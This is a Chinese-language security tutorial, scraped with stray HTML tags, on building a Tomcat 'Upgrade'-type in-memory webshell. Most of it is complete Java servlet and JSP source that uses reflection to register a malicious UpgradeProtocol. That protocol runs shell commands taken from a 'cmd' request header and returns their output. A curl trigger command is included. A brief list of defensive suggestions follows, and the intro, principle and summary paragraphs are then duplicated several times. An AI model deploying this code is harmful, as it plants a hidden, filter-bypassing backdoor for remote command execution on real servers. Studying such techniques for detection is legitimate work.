Tomcat Upgrade型内存马构建与调试分析<\/h1>

前言<\/h2>
在当今网络安全环境下，传统文件形式的后门容易被检测，内存马技术因其隐蔽性成为研究热点。本文将详细介绍Tomcat Upgrade型内存马的原理、构建和调试方法。<\/p>

基本概念<\/h2>

Upgrade型内存马利用了Tomcat的协议升级机制，在请求进入Filter之前植入恶意代码，解决了以下问题：<\/p>

绕过原有Filter的鉴权<\/li>
解决反代导致的路径问题<\/li>

在请求处理早期阶段执行恶意代码<\/li> <\/ul>

技术原理<\/h2>
Tomcat处理请求的流程中，Upgrade机制位于Filter之前，具体在`Execute<\/code>和Process<\/code>阶段之间。通过构造恶意的UpgradeProtocol<\/code>并插入到Tomcat的httpUpgradeProtocols<\/code>中，可以实现内存马的植入。<\/p>`

核心实现<\/h2>
1. 基础示例<\/h3>
package<\/span> com.al1ex.servlet;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> javax.servlet.annotation.WebServlet;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServlet;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServletRequest;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServletResponse;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.connector.RequestFacade;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.connector.Request;<\/span>
<\/span><\/span>import<\/span> org.apache.coyote.Adapter;<\/span>
<\/span><\/span>import<\/span> org.apache.coyote.Processor;<\/span>
<\/span><\/span>import<\/span> org.apache.coyote.UpgradeProtocol;<\/span>
<\/span><\/span>import<\/span> org.apache.coyote.Response;<\/span>
<\/span><\/span>import<\/span> org.apache.coyote.http11.upgrade.InternalHttpUpgradeHandler;<\/span>
<\/span><\/span>import<\/span> org.apache.tomcat.util.net.SocketWrapperBase;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.nio.ByteBuffer;<\/span>
<\/span><\/span>
<\/span><\/span>@WebServlet<\/span>(<\/span>"\/evil"<\/span>)<\/span>
<\/span><\/span>public<\/span> class<\/span> TestUpgrade<\/span> extends<\/span> HttpServlet {<\/span>
<\/span><\/span>    static<\/span> class<\/span> MyUpgrade<\/span> implements<\/span> UpgradeProtocol {<\/span>
<\/span><\/span>        public<\/span> String getHttpUpgradeName<\/span>(<\/span>boolean<\/span> b)<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span>
<\/span><\/span>        public<\/span> byte<\/span>[]<\/span> getAlpnIdentifier<\/span>()<\/span> {<\/span> return<\/span> new<\/span> byte<\/span>[<\/span>0<\/span>];<\/span> }<\/span>
<\/span><\/span>        public<\/span> String getAlpnName<\/span>()<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span>
<\/span><\/span>        public<\/span> Processor getProcessor<\/span>(<\/span>SocketWrapperBase<?><\/span> socketWrapperBase,<\/span> Adapter adapter)<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span>
<\/span><\/span>        public<\/span> InternalHttpUpgradeHandler getInternalUpgradeHandler<\/span>(<\/span>Adapter adapter,<\/span> org.<\/span>apache<\/span>.<\/span>coyote<\/span>.<\/span>Request<\/span> request)<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span>
<\/span><\/span>        public<\/span> InternalHttpUpgradeHandler getInternalUpgradeHandler<\/span>(<\/span>SocketWrapperBase<?><\/span> socketWrapperBase,<\/span> Adapter adapter,<\/span> org.<\/span>apache<\/span>.<\/span>coyote<\/span>.<\/span>Request<\/span> request)<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span>
<\/span><\/span>        
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        public<\/span> boolean<\/span> accept<\/span>(<\/span>org.<\/span>apache<\/span>.<\/span>coyote<\/span>.<\/span>Request<\/span> request)<\/span> {<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                Field response =<\/span> org.<\/span>apache<\/span>.<\/span>coyote<\/span>.<\/span>Request<\/span>.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"response"<\/span>);<\/span>
<\/span><\/span>                response.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                Response resp =<\/span> (<\/span>Response)<\/span> response.<\/span>get<\/span>(<\/span>request);<\/span>
<\/span><\/span>                resp.<\/span>doWrite<\/span>(<\/span>ByteBuffer.<\/span>wrap<\/span>(<\/span>"Hello, this my test Upgrade!"<\/span>.<\/span>getBytes<\/span>()));<\/span>
<\/span><\/span>            }<\/span> catch<\/span> (<\/span>Exception ignored)<\/span> {}<\/span>
<\/span><\/span>            return<\/span> false<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    protected<\/span> void<\/span> doGet<\/span>(<\/span>HttpServletRequest req,<\/span> HttpServletResponse resp)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            RequestFacade rf =<\/span> (<\/span>RequestFacade)<\/span> req;<\/span>
<\/span><\/span>            Field requestField =<\/span> RequestFacade.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"request"<\/span>);<\/span>
<\/span><\/span>            requestField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            Request request1 =<\/span> (<\/span>Request)<\/span> requestField.<\/span>get<\/span>(<\/span>rf);<\/span>
<\/span><\/span>            new<\/span> MyUpgrade().<\/span>accept<\/span>(<\/span>request1.<\/span>getCoyoteRequest<\/span>());<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception ignored)<\/span> {}<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 完整内存马实现<\/h3>
package<\/span> com.al1ex.servlet;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> javax.servlet.annotation.WebServlet;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServlet;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServletRequest;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServletResponse;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.connector.Connector;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.connector.RequestFacade;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.connector.Request;<\/span>
<\/span><\/span>import<\/span> org.apache.coyote.Adapter;<\/span>
<\/span><\/span>import<\/span> org.apache.coyote.Processor;<\/span>
<\/span><\/span>import<\/span> org.apache.coyote.UpgradeProtocol;<\/span>
<\/span><\/span>import<\/span> org.apache.coyote.Response;<\/span>
<\/span><\/span>import<\/span> org.apache.coyote.http11.AbstractHttp11Protocol;<\/span>
<\/span><\/span>import<\/span> org.apache.coyote.http11.upgrade.InternalHttpUpgradeHandler;<\/span>
<\/span><\/span>import<\/span> org.apache.tomcat.util.net.SocketWrapperBase;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.nio.ByteBuffer;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>
<\/span><\/span>@WebServlet<\/span>(<\/span>"\/evil"<\/span>)<\/span>
<\/span><\/span>public<\/span> class<\/span> TestUpgrade<\/span> extends<\/span> HttpServlet {<\/span>
<\/span><\/span>    static<\/span> class<\/span> MyUpgrade<\/span> implements<\/span> UpgradeProtocol {<\/span>
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        public<\/span> String getHttpUpgradeName<\/span>(<\/span>boolean<\/span> b)<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span>
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        public<\/span> byte<\/span>[]<\/span> getAlpnIdentifier<\/span>()<\/span> {<\/span> return<\/span> new<\/span> byte<\/span>[<\/span>0<\/span>];<\/span> }<\/span>
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        public<\/span> String getAlpnName<\/span>()<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span>
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        public<\/span> Processor getProcessor<\/span>(<\/span>SocketWrapperBase<?><\/span> socketWrapperBase,<\/span> Adapter adapter)<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span>
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        public<\/span> InternalHttpUpgradeHandler getInternalUpgradeHandler<\/span>(<\/span>Adapter adapter,<\/span> org.<\/span>apache<\/span>.<\/span>coyote<\/span>.<\/span>Request<\/span> request)<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span>
<\/span><\/span>        
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        public<\/span> boolean<\/span> accept<\/span>(<\/span>org.<\/span>apache<\/span>.<\/span>coyote<\/span>.<\/span>Request<\/span> request)<\/span> {<\/span>
<\/span><\/span>            String p =<\/span> request.<\/span>getHeader<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                String[]<\/span> cmd =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>)<\/span> 
<\/span><\/span>                    ?<\/span> new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> p}<\/span> 
<\/span><\/span>                    :<\/span> new<\/span> String[]{<\/span>"\/bin\/sh"<\/span>,<\/span> "-c"<\/span>,<\/span> p};<\/span>
<\/span><\/span>                Field response =<\/span> org.<\/span>apache<\/span>.<\/span>coyote<\/span>.<\/span>Request<\/span>.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"response"<\/span>);<\/span>
<\/span><\/span>                response.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                Response resp =<\/span> (<\/span>Response)<\/span> response.<\/span>get<\/span>(<\/span>request);<\/span>
<\/span><\/span>                byte<\/span>[]<\/span> result =<\/span> new<\/span> java.<\/span>util<\/span>.<\/span>Scanner<\/span>(<\/span>
<\/span><\/span>                    new<\/span> ProcessBuilder(<\/span>cmd).<\/span>start<\/span>().<\/span>getInputStream<\/span>(),<\/span> "GBK"<\/span>)<\/span>
<\/span><\/span>                    .<\/span>useDelimiter<\/span>(<\/span>"\\A"<\/span>).<\/span>next<\/span>().<\/span>getBytes<\/span>();<\/span>
<\/span><\/span>                resp.<\/span>setCharacterEncoding<\/span>(<\/span>"GBK"<\/span>);<\/span>
<\/span><\/span>                resp.<\/span>doWrite<\/span>(<\/span>ByteBuffer.<\/span>wrap<\/span>(<\/span>result));<\/span>
<\/span><\/span>            }<\/span> catch<\/span> (<\/span>Exception ignored)<\/span> {}<\/span>
<\/span><\/span>            return<\/span> false<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    protected<\/span> void<\/span> doGet<\/span>(<\/span>HttpServletRequest req,<\/span> HttpServletResponse resp)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            RequestFacade rf =<\/span> (<\/span>RequestFacade)<\/span> req;<\/span>
<\/span><\/span>            Field requestField =<\/span> RequestFacade.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"request"<\/span>);<\/span>
<\/span><\/span>            requestField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            Request request1 =<\/span> (<\/span>Request)<\/span> requestField.<\/span>get<\/span>(<\/span>rf);<\/span>
<\/span><\/span>            
<\/span><\/span>            Field connector =<\/span> Request.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"connector"<\/span>);<\/span>
<\/span><\/span>            connector.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            Connector realConnector =<\/span> (<\/span>Connector)<\/span> connector.<\/span>get<\/span>(<\/span>request1);<\/span>
<\/span><\/span>            
<\/span><\/span>            Field protocolHandlerField =<\/span> Connector.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"protocolHandler"<\/span>);<\/span>
<\/span><\/span>            protocolHandlerField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            AbstractHttp11Protocol handler =<\/span> (<\/span>AbstractHttp11Protocol)<\/span> protocolHandlerField.<\/span>get<\/span>(<\/span>realConnector);<\/span>
<\/span><\/span>            
<\/span><\/span>            Field upgradeProtocolsField =<\/span> AbstractHttp11Protocol.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"httpUpgradeProtocols"<\/span>);<\/span>
<\/span><\/span>            upgradeProtocolsField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            HashMap upgradeProtocols =<\/span> (<\/span>HashMap)<\/span> upgradeProtocolsField.<\/span>get<\/span>(<\/span>handler);<\/span>
<\/span><\/span>            
<\/span><\/span>            MyUpgrade myUpgrade =<\/span> new<\/span> MyUpgrade();<\/span>
<\/span><\/span>            upgradeProtocols.<\/span>put<\/span>(<\/span>"hello"<\/span>,<\/span> myUpgrade);<\/span>
<\/span><\/span>            upgradeProtocolsField.<\/span>set<\/span>(<\/span>handler,<\/span> upgradeProtocols);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception ignored)<\/span> {}<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. JSP版本实现<\/h3>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Connector" %>
<%@ page import="org.apache.coyote.http11.AbstractHttp11Protocol" %>
<%@ page import="org.apache.coyote.UpgradeProtocol" %>
<%@ page import="java.util.HashMap" %>
<%@ page import="org.apache.coyote.Processor" %>
<%@ page import="org.apache.tomcat.util.net.SocketWrapperBase" %>
<%@ page import="org.apache.coyote.Adapter" %>
<%@ page import="org.apache.coyote.http11.upgrade.InternalHttpUpgradeHandler" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="java.nio.ByteBuffer" %>

<% 
class MyUpgrade implements UpgradeProtocol {
    public String getHttpUpgradeName(boolean isSSLEnabled) { return "hello"; }
    public byte[] getAlpnIdentifier() { return new byte[0]; }
    public String getAlpnName() { return null; }
    public Processor getProcessor(SocketWrapperBase<?> socketWrapper, Adapter adapter) { return null; }
    @Override
    public InternalHttpUpgradeHandler getInternalUpgradeHandler(Adapter adapter, org.apache.coyote.Request request) { return null; }
    
    @Override
    public boolean accept(org.apache.coyote.Request request) {
        String p = request.getHeader("cmd");
        try {
            String[] cmd = System.getProperty("os.name").toLowerCase().contains("win") 
                ? new String[]{"cmd.exe", "\/c", p} 
                : new String[]{"\/bin\/sh", "-c", p};
            Field response = org.apache.coyote.Request.class.getDeclaredField("response");
            response.setAccessible(true);
            org.apache.coyote.Response resp = (org.apache.coyote.Response) response.get(request);
            byte[] result = new java.util.Scanner(
                new ProcessBuilder(cmd).start().getInputStream(), "GBK")
                .useDelimiter("\\A").next().getBytes();
            resp.setCharacterEncoding("GBK");
            resp.doWrite(ByteBuffer.wrap(result));
        } catch (Exception ignored){}
        return false;
    }
}
%>

<%
Field reqF = request.getClass().getDeclaredField("request");
reqF.setAccessible(true);
Request req = (Request) reqF.get(request);

Field conn = Request.class.getDeclaredField("connector");
conn.setAccessible(true);
Connector connector = (Connector) conn.get(req);

Field proHandler = Connector.class.getDeclaredField("protocolHandler");
proHandler.setAccessible(true);
AbstractHttp11Protocol handler = (AbstractHttp11Protocol) proHandler.get(connector);

Field upgradeProtocolsField = AbstractHttp11Protocol.class.getDeclaredField("httpUpgradeProtocols");
upgradeProtocolsField.setAccessible(true);
HashMap upgradeProtocols = (HashMap) upgradeProtocolsField.get(handler);

upgradeProtocols.put("hello", new MyUpgrade());
upgradeProtocolsField.set(handler, upgradeProtocols);
%>
<\/code><\/pre>
调试分析<\/h2>


关键断点位置：StandardHostValve.java<\/code>中的process<\/code>函数调用处<\/p>
<\/li>

调用流程：<\/p>

org.apache.coyote.AbstractProcessorLight#process<\/code><\/li>
当SocketWrapperBase<\/code>状态为OPEN_READ<\/code>时调用对应的processor处理<\/li>
检查header中的Connection<\/code>头是否为upgrade<\/code><\/li>
调用getUpgradeProtocol<\/code>方法根据upgradedName<\/code>从httpUpgradeProtocols<\/code>获取UpgradeProtocol<\/code><\/li>
调用UpgradeProtocol<\/code>对象的accept<\/code>方法<\/li>
<\/ul>
<\/li>

关键反射路径：<\/p>
Request -> Connector -> ProtocolHandler -> httpUpgradeProtocols
<\/code><\/pre>
<\/li>
<\/ol>
攻击测试<\/h2>
使用curl测试：<\/p>
curl -H "Connection: Upgrade"<\/span> -H "Upgrade: hello"<\/span> -H "cmd: whoami"<\/span> http:\/\/localhost:8080\/evil
<\/span><\/span><\/code><\/pre>防御建议<\/h2>

监控Tomcat中httpUpgradeProtocols<\/code>的异常修改<\/li>
限制反射操作权限<\/li>
检查异常Upgrade<\/code>头请求<\/li>
使用RASP进行运行时防护<\/li>
<\/ol>
版本注意事项<\/h2>
不同Tomcat版本可能有差异，实现时需注意：<\/p>

类路径和包结构变化<\/li>
字段名称可能不同<\/li>
方法签名可能有差异<\/li>
<\/ol>
总结<\/h2>
Upgrade型内存马通过在Tomcat早期处理阶段植入恶意代码，具有较高的隐蔽性和绕过能力。理解其原理有助于更好地防御此类攻击。<\/p>

Tomcat Upgrade型内存马构建与调试分析<\/h1>

前言<\/h2> 在当今网络安全环境下，传统文件形式的后门容易被检测，内存马技术因其隐蔽性成为研究热点。本文将详细介绍Tomcat Upgrade型内存马的原理、构建和调试方法。<\/p>

技术原理<\/h2> Tomcat处理请求的流程中，Upgrade机制位于Filter之前，具体在Execute<\/code>和Process<\/code>阶段之间。通过构造恶意的UpgradeProtocol<\/code>并插入到Tomcat的httpUpgradeProtocols<\/code>中，可以实现内存马的植入。<\/p>

总结<\/h2> Upgrade型内存马通过在Tomcat早期处理阶段植入恶意代码，具有较高的隐蔽性和绕过能力。理解其原理有助于更好地防御此类攻击。<\/p>

前言<\/h2>
在当今网络安全环境下，传统文件形式的后门容易被检测，内存马技术因其隐蔽性成为研究热点。本文将详细介绍Tomcat Upgrade型内存马的原理、构建和调试方法。<\/p>

技术原理<\/h2>
Tomcat处理请求的流程中，Upgrade机制位于Filter之前，具体在`Execute<\/code>和Process<\/code>阶段之间。通过构造恶意的UpgradeProtocol<\/code>并插入到Tomcat的httpUpgradeProtocols<\/code>中，可以实现内存马的植入。<\/p>`

总结<\/h2>
Upgrade型内存马通过在Tomcat早期处理阶段植入恶意代码，具有较高的隐蔽性和绕过能力。理解其原理有助于更好地防御此类攻击。<\/p>